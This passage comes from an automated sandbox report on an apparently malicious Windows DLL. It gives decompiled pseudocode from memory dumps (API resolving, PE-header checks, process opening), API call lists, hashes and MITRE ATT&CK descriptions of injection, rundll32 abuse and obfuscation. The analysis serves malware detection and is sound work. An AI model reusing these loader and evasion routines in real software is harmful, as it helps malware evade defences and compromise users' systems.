								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6D64136A(_t42);
					L8:
					return _t29;
				}
			}

0x6d64123e
0x6d641240
0x6d64125c
0x6d64126d
0x6d641274
0x6d6412d2
0x00000000
0x6d641276
0x6d641276
0x6d641280
0x6d641284
0x6d641289
0x6d64128c
0x6d641291
0x6d641295
0x6d64129a
0x6d64129f
0x6d6412a3
0x6d6412a8
0x6d6412a9
0x6d6412ad
0x6d6412b2
0x6d6412ba
0x6d6412ba
0x6d6412b2
0x6d6412a3
0x6d641295
0x6d6412bc
0x6d6412c5
0x6d6412c9
0x6d6412d3
0x6d6412d9
0x6d6412d9

APIs

Part of subcall function 6D641AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D641272,?,?,?,?,00000002,00000000,?,?), ref: 6D641AC9
Part of subcall function 6D641AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D641AEB
Part of subcall function 6D641AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D641B01
Part of subcall function 6D641AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D641B17
Part of subcall function 6D641AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D641B2D
Part of subcall function 6D641AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D641B43

Part of subcall function 6D6414DE: memcpy.NTDLL(00000000,00000002,6D641280,?,?,?,?,?,6D641280,?,?,?,?,?,?,00000002), ref: 6D64150B
Part of subcall function 6D6414DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6D64153E

Part of subcall function 6D641F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D641F69

Part of subcall function 6D641030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6D641069
Part of subcall function 6D641030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D6410DE
Part of subcall function 6D641030: GetLastError.KERNEL32 ref: 6D6410E4

GetLastError.KERNEL32(?,?), ref: 6D6412B4

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: b8d6a3322fd9111c85fdddb7c8c433a4e7f38711e29273caf173d44dda7e333c
Instruction ID: d8fb754bd2566c05b28a839c6563ddbd7cc51337efb53a423b6d0c8421b1ff18
Opcode Fuzzy Hash: b8d6a3322fd9111c85fdddb7c8c433a4e7f38711e29273caf173d44dda7e333c
Instruction Fuzzy Hash: 0C115B767007066BC711DAA9CC80D9B77BCBF4C308700C128EA05D3640EBE4ED1287A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D67BE2F, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 6D67BE66
___getlocaleinfo.LIBCMT ref: 6D67BE7B
___getlocaleinfo.LIBCMT ref: 6D67BE90
___getlocaleinfo.LIBCMT ref: 6D67BEA5
___getlocaleinfo.LIBCMT ref: 6D67BEBD
___getlocaleinfo.LIBCMT ref: 6D67BED2
___getlocaleinfo.LIBCMT ref: 6D67BEE4
___getlocaleinfo.LIBCMT ref: 6D67BEF9
___getlocaleinfo.LIBCMT ref: 6D67BF11
___getlocaleinfo.LIBCMT ref: 6D67BF26

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: ec4cfb9cd1c66f1ee37d8fd0d0a81c3be357d00ce7ab14daa680d271b3f4a16c
Instruction ID: db543e26fbb1013355efdaf88eb01696a81ddb6e47612269c12bb2feedef491c
Opcode Fuzzy Hash: ec4cfb9cd1c66f1ee37d8fd0d0a81c3be357d00ce7ab14daa680d271b3f4a16c
Instruction Fuzzy Hash: B5E19EB290020EBEFB21CAE1CD45DFF77BDEB08748F05092AF25592050EA75AF099765

Uniqueness

Uniqueness Score: -1.00%

Function 6D642485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D642485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d6441f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d644240 = 1;
										__eflags =  *0x6d644240;
										if( *0x6d644240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d6441f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d644240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d6441f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d644200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d6441fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d644240 = 1;
							__eflags =  *0x6d644240;
							if( *0x6d644240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d644240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d644200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d6441f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d644200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d644200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D642536

Strings

@Bdm, xrefs: 6D642637
@Bdm, xrefs: 6D642694
@Bdm, xrefs: 6D642555

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID: @Bdm$@Bdm$@Bdm
API String ID: 2850889275-722537664
Opcode ID: 329bed79424b667daa55acef94ef76e06f374f81e21356ba3f4569438cbc1c75
Instruction ID: 2007ed2ab4bc134f0b6ad68590f139c5615d4087c3866b31133e017b050b7cc9
Opcode Fuzzy Hash: 329bed79424b667daa55acef94ef76e06f374f81e21356ba3f4569438cbc1c75
Instruction Fuzzy Hash: 9D61C1306446138FDB29CF29D8A076973B6FB8E368F34C469D916C7294E770D882CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6D685B3C, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 311COMMON

Download Yara Rule

APIs

operator+.LIBCMT ref: 6D685BB5
DName::DName.LIBCMT ref: 6D685BD5
operator+.LIBCMT ref: 6D685C15
UnDecorator::getScope.LIBCMT ref: 6D685C3E
operator+.LIBCMT ref: 6D685C4A
DName::operator+.LIBCMT ref: 6D685C54
operator+.LIBCMT ref: 6D685B57

Part of subcall function 6D683058: DName::DName.LIBCMT ref: 6D68306B
Part of subcall function 6D683058: DName::operator+.LIBCMT ref: 6D683072

DName::DName.LIBCMT ref: 6D685B78
operator+.LIBCMT ref: 6D685C61
UnDecorator::getThisType.LIBCMT ref: 6D685CA1
operator+.LIBCMT ref: 6D685CE0
DName::operator+.LIBCMT ref: 6D685CEA
UnDecorator::getThisType.LIBCMT ref: 6D685CFC
DName::operator|=.LIBCMT ref: 6D685D06
operator+.LIBCMT ref: 6D685D1D
DName::DName.LIBCMT ref: 6D685E83

Strings

$Iym Iym(Iym, xrefs: 6D685B3E

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: operator+$NameName::$Decorator::getName::operator+$ThisType$Name::operator|=Scope
String ID: $Iym Iym(Iym
API String ID: 398566123-3637418734
Opcode ID: 5c05a0b9dea83bafc8df243b6b658d5dfa429083de6a059c2a48e5b00a7a9806
Instruction ID: 8ecac473325d2190ca3149129f7e9382218119b5b658a4a482e910d306361176
Opcode Fuzzy Hash: 5c05a0b9dea83bafc8df243b6b658d5dfa429083de6a059c2a48e5b00a7a9806
Instruction Fuzzy Hash: 2DB18272904249AFCF10DFA4C894EFDB7B8AB0D354F01406AE616EB292DB709644CB79

Uniqueness

Uniqueness Score: -1.00%

Function 6D67975C, Relevance: 15.1, APIs: 10, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6D679775

Part of subcall function 6D6762EB: __calloc_impl.LIBCMT ref: 6D6762FC

__calloc_crt.LIBCMT ref: 6D679799
__calloc_crt.LIBCMT ref: 6D6797B5
__copytlocinfo_nolock.LIBCMT ref: 6D6797DA
__setlocale_nolock.LIBCMT ref: 6D6797E7
___removelocaleref.LIBCMT ref: 6D6797F3
___freetlocinfo.LIBCMT ref: 6D6797FA
__setmbcp_nolock.LIBCMT ref: 6D679812
___removelocaleref.LIBCMT ref: 6D679827
___freetlocinfo.LIBCMT ref: 6D67982E

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3967206232-0
Opcode ID: a701ed512f87a49312e378cb8804229947c4e2f842cddbe7443ef6e91f3fef4b
Instruction ID: 95f5eb1b031b2aad95e3d70000f5aef0e94d577051e7147b0d652515807094f9
Opcode Fuzzy Hash: a701ed512f87a49312e378cb8804229947c4e2f842cddbe7443ef6e91f3fef4b
Instruction Fuzzy Hash: 0D21293550C60DAFD732AF6CD801D5A7BE4EF8D758B11842EE59C46160DF32D810CA59

Uniqueness

Uniqueness Score: -1.00%

Function 6D684A81, Relevance: 12.1, APIs: 8, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6D684A8B
DName::DName.LIBCMT ref: 6D684A97

Part of subcall function 6D6829CC: DName::doPchar.LIBCMT ref: 6D6829F9

DName::DName.LIBCMT ref: 6D684AC4

Part of subcall function 6D68262D: DNameStatusNode::make.LIBCMT ref: 6D68265B

UnDecorator::getScopedName.LIBCMT ref: 6D684AD2
DName::operator+=.LIBCMT ref: 6D684ADC
DName::operator+=.LIBCMT ref: 6D684AEB
DName::operator+=.LIBCMT ref: 6D684AF7
DName::operator+=.LIBCMT ref: 6D684B04

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: NameName::operator+=$Name::$Decorator::Decorator::getName::doNode::makePcharScopedScoreStatus
String ID:
API String ID: 2229739886-0
Opcode ID: fc5e5e6a1abf896655c1611ee8160a1d268b157798602f17028a713b7ccbbf16
Instruction ID: ff3787b4063aa0a560a51b6c37a2866b347ef49ff199c158cf4360d898b80f6a
Opcode Fuzzy Hash: fc5e5e6a1abf896655c1611ee8160a1d268b157798602f17028a713b7ccbbf16
Instruction Fuzzy Hash: 4A11C871504149AFDB15DBA4C854BFD7B79AB0C308F014059E5199B293DFF0AA45CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 6D673A3E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D673F76

Part of subcall function 6D673BA0: __FF_MSGBANNER.LIBCMT ref: 6D673BC3
Part of subcall function 6D673BA0: __NMSG_WRITE.LIBCMT ref: 6D673BCA

std::bad_alloc::bad_alloc.LIBCMT ref: 6D673F99

Part of subcall function 6D673EF2: std::exception::exception.LIBCMT ref: 6D673EFE

std::bad_exception::bad_exception.LIBCMT ref: 6D673FAD
__CxxThrowException@8.LIBCMT ref: 6D673FBB

Strings

t?ym, xrefs: 6D673F89

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID: t?ym
API String ID: 1802512180-667981088
Opcode ID: 13fcc2740523a2fc6716f985400c2993fa9a7d5217f90b59d172204676596cc9
Instruction ID: e79e711649e9d1aed3d3a324a4da685f8bb3ff160d7e7c68a82ae72aaac359c3
Opcode Fuzzy Hash: 13fcc2740523a2fc6716f985400c2993fa9a7d5217f90b59d172204676596cc9
Instruction Fuzzy Hash: 22F09E3240C20F32CF289634EC04E7D77799B4E3ACF518025F93D56084DF65DE01819A

Uniqueness

Uniqueness Score: -1.00%

Function 6D6833EA, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentTypes.LIBCMT ref: 6D683425
operator+.LIBCMT ref: 6D683434
DName::DName.LIBCMT ref: 6D683451
DName::operator+.LIBCMT ref: 6D683458
DName::operator+.LIBCMT ref: 6D68345F

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: Name::operator+$ArgumentDecorator::getNameName::Typesoperator+
String ID:
API String ID: 4203687869-0
Opcode ID: c60fe6047f4041913148cc39ad57cb07065a35704fbae00e47229a46f210437d
Instruction ID: ebde616b94e547ab92a1058d9b6e2570fb36af6161c8de73b39890ada83a02b4
Opcode Fuzzy Hash: c60fe6047f4041913148cc39ad57cb07065a35704fbae00e47229a46f210437d
Instruction Fuzzy Hash: 12018F31A04109ABCF01DBB8C851EED7BB5EB4D30CF018455FA15EB292DB71D5458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6D678BF9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6D678B50

Part of subcall function 6D67432E: __mtinitlocknum.LIBCMT ref: 6D674344
Part of subcall function 6D67432E: __amsg_exit.LIBCMT ref: 6D674350

__lock.LIBCMT ref: 6D678B90
___removelocaleref.LIBCMT ref: 6D678B9F
___freetlocinfo.LIBCMT ref: 6D678BB8

Part of subcall function 6D673A49: __lock.LIBCMT ref: 6D673A67
Part of subcall function 6D673A49: ___sbh_find_block.LIBCMT ref: 6D673A72
Part of subcall function 6D673A49: ___sbh_free_block.LIBCMT ref: 6D673A81

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __lock$___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
String ID:
API String ID: 2822171422-0
Opcode ID: a6b672a0944707210210970be132e8b6086288867e734516a517d9cb8125d38d
Instruction ID: ed80d5269713f449f698fd1bed94ae6245ee7eaa67dc249459ff2850a9105139
Opcode Fuzzy Hash: a6b672a0944707210210970be132e8b6086288867e734516a517d9cb8125d38d
Instruction Fuzzy Hash: 1411E0B050930DEADB309FB99444B2E77A4AF0CB64F214559E1689B1F0DB74DC80C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 6D64146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D64146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d6441b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d6441bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d6441ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d6441a8 = _t5;
					 *0x6d6441b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d6441a4 = _t6;
					if(_t6 == 0) {
						 *0x6d6441a4 =  *0x6d6441a4 | 0xffffffff;
					}
					return 0;
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D6417B8,76D263F0,00000000), ref: 6D64147B
GetVersion.KERNEL32 ref: 6D64148A
GetCurrentProcessId.KERNEL32 ref: 6D641499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D6414B2

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 1b8804481e03314e928aed295978ddaea08c43920e36187884a3ed133dfbb055
Instruction ID: da9e1e63f2851b3d81ee1ab3ea53779c73f3336adf80ce43d56549f133ca8553
Opcode Fuzzy Hash: 1b8804481e03314e928aed295978ddaea08c43920e36187884a3ed133dfbb055
Instruction Fuzzy Hash: C8F01771684251AFEF50BF6AA80A7A53BB4BB1EB11F11C21AF115EA1C0E3F060C58B54

Uniqueness

Uniqueness Score: -1.00%

Function 6D678A04, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D678A10

Part of subcall function 6D675F1B: __getptd_noexit.LIBCMT ref: 6D675F1E
Part of subcall function 6D675F1B: __amsg_exit.LIBCMT ref: 6D675F2B

__getptd.LIBCMT ref: 6D678A27
__amsg_exit.LIBCMT ref: 6D678A35
__lock.LIBCMT ref: 6D678A45

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 0a42aab82b37ccd3a3f3ce90c25fb9079bb5ed213974ca18822b879e1da12dd2
Instruction ID: 97413f951a4a33cccddbf83f0ba6d96c81067c665aef7e7c193f18127f9b9180
Opcode Fuzzy Hash: 0a42aab82b37ccd3a3f3ce90c25fb9079bb5ed213974ca18822b879e1da12dd2
Instruction Fuzzy Hash: E9F09031D0870EDBD730DB798001B6D73A0AF0C769F424689D65DA76E1DF749D01CA6A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

